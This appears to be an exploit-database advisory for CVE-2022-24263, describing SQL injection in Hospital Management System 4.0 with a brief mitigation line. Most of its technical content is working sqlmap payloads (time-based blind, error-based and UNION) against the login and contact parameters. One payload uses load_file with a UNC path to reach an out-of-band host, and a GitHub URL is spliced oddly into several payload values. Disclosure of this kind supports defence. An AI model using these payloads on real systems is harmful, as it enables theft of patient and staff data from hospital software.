Hospital Management System 4.0 - 'multiple' SQL Injection

vendor:

Hospital Management System

by:

nu11secur1ty

9.8

CVSS

CRITICAL

SQL Injection

CWE

Product Name: Hospital Management System

Affected Version From: 4

Affected Version To: 4

Patch Exists: NO

Related CWE: CVE-2022-24263

CPE: a:kishan0725:hospital_management_system:4.0

Metasploit:

Other Scripts:

Platforms Tested:

2022

Hospital Management System 4.0 – ‘multiple’ SQL Injection

The Hospital Management System v4.0 is suffering from Multiple SQL-Injections via three parameters in function.php, contact.php, and func3.php applications. The attacker can be receiving the all information from the system by using this vulnerability, and also the malicious actor can use sensitive information from the customers of this system. WARNING: If this is in some external domain, or some subdomain, or internal, this will be extremely dangerous!

Mitigation:

Implement proper input validation and parameterized queries to prevent SQL Injection vulnerabilities. Regularly update and patch the Hospital Management System software.

Source

Exploit-DB raw data:

# Title: Hospital Management System 4.0 - 'multiple' SQL Injection
# Author: nu11secur1ty
# Date: 02.06.2022
# Vendor: https://github.com/kishan0725
# Software: https://github.com/kishan0725/Hospital-Management-System
# CVE-2022-24263


## Description:
The Hospital Management System v4.0 is suffering from Multiple
SQL-Injections via three parameters in function.php,  contact.php, and
func3.php applications.
The attacker can be receiving the all information from the system by
using this vulnerability, and also the malicious actor can use
sensitive information from the customers of this system.
WARNING: If this is in some external domain, or some subdomain, or
internal, this will be extremely dangerous!
Status: CRITICAL


[+] Payloads:

---
Parameter: txtName (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: txtName=821761' AND (SELECT 9346 FROM
(SELECT(SLEEP(3)))HJGv) AND
'xkCZ'='xkCZ&txtEmail=xstxPhYW@https://github.com/kishan0725/Hospital-Management-System&txtPhone=813-439-23'+(select
load_file('\\\\k0lnu24kl14z5bxcoo5tj7z4bvho5fz3q6ey1qpf.https://github.com/kishan0725/Hospital-Management-System\\hgq'))+'&btnSubmit=Send
Message&txtMsg=441931
---

-------------------------------------------

---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: email=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2936)
OR 1 GROUP BY CONCAT(0x7162706271,(SELECT (CASE WHEN (5080=5080) THEN
1 ELSE 0 END)),0x716b767a71,FLOOR(RAND(0)*2)) HAVING
MIN(0)#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login

    Type: UNION query
    Title: MySQL UNION query (random number) - 1 column
    Payload: email=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2730)
UNION ALL SELECT
8185,8185,CONCAT(0x7162706271,0x5777534a4b68716f6d4270614362544c4954786a4f774b6852586b47694945644a70757262644c52,0x716b767a71),8185,8185,8185,8185,8185#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login
---

-------------------------------------------

---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: username3=CHnDaCTc'+(select-2423) OR 1 GROUP BY
CONCAT(0x71626a6271,(SELECT (CASE WHEN (5907=5907) THEN 1 ELSE 0
END)),0x716b766b71,FLOOR(RAND(0)*2)) HAVING
MIN(0)#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login

    Type: UNION query
    Title: MySQL UNION query (random number) - 1 column
    Payload: username3=CHnDaCTc'+(select-3282) UNION ALL SELECT
CONCAT(0x71626a6271,0x446c68526a796c4475676e54774d6b617a6977736855756f63796f43686d706c637877534a557076,0x716b766b71),4829,4829,4829,4829#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login
---

## Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-24263